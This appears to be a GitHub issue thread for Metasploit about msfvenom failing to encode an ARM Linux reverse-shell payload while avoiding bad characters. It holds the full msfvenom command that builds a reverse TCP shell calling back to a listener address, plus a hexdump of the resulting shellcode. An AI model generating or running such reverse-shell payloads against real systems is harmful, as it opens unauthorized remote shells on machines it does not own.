metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard
verified publisher icon rapid7

Error An encoding exception occurred linux/armle/shell_reverse_tcp

Open umerov1999 opened this issue 9 years ago • 2 comments

msfvenom -p linux/armle/shell_reverse_tcp -b '\x00\x0a\x0d\x40' lhost=192.168.1.122 lport=1996 R > shell.bin

No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: armle from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=1, char=0x00) Error: An encoding exception occurred.

umerov1999 avatar Jan 17 '16 15:01 umerov1999

Hmm, looks like we would need an arm-specific encoder to avoid badchars.

bcook-r7 avatar Jan 17 '16 16:01 bcook-r7

I don't get the generic/none failed with Encoding failed due to a bad character (index=1, char=0x00) error described in the original post.

The generic/none encoder is not used when using elf of raw formats. The payload is returned without modification; ie, bad characters are ignored.

# ./msfvenom -p linux/armle/shell_reverse_tcp -b '\x00\x0a\x0d\x40' lhost=192.168.1.122 lport=1996 R > shell.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder specified, outputting raw payload
Payload size: 172 bytes

# hexdump -C shell.bin | grep 00
00000000  02 00 a0 e3 01 10 a0 e3  05 20 81 e2 8c 70 a0 e3  |......... ...p..|
00000010  8d 70 87 e2 00 00 00 ef  00 60 a0 e1 60 10 8f e2  |.p.......`..`...|
00000020  10 20 a0 e3 8d 70 a0 e3  8e 70 87 e2 00 00 00 ef  |. ...p...p......|
00000030  06 00 a0 e1 00 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000040  06 00 a0 e1 01 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000050  06 00 a0 e1 02 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000060  24 00 8f e2 04 40 24 e0  10 00 2d e9 0d 20 a0 e1  |$....@$...-.. ..|
00000070  24 40 8f e2 10 00 2d e9  0d 10 a0 e1 0b 70 a0 e3  |[email protected]..|
00000080  00 00 00 ef 02 00 07 cc  c0 a8 01 7a 2f 62 69 6e  |...........z/bin|
00000090  2f 73 68 00 00 00 00 00  00 00 00 00 73 68 00 00  |/sh.........sh..|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00              |............|
000000ac
# hexdump -C shell.bin | grep 0a
000000a0  00 00 00 00 00 00 00 00  00 00 00 00              |............|
000000ac
# hexdump -C shell.bin | grep 0d
00000060  24 00 8f e2 04 40 24 e0  10 00 2d e9 0d 20 a0 e1  |$....@$...-.. ..|
00000070  24 40 8f e2 10 00 2d e9  0d 10 a0 e1 0b 70 a0 e3  |[email protected]..|

Metasploit still does not have 32-bit and 64-bit ARM encoders, in large part due to Metasm not supporting 32-bit ARM or 64-bit ARM. Development on the metasm project seems to have stalled, and Aarch64 contributions have been ignored. As such, ARM encoders would likely require hand crafted assembly to be modified at runtime.

bcoles avatar Oct 04 '24 18:10 bcoles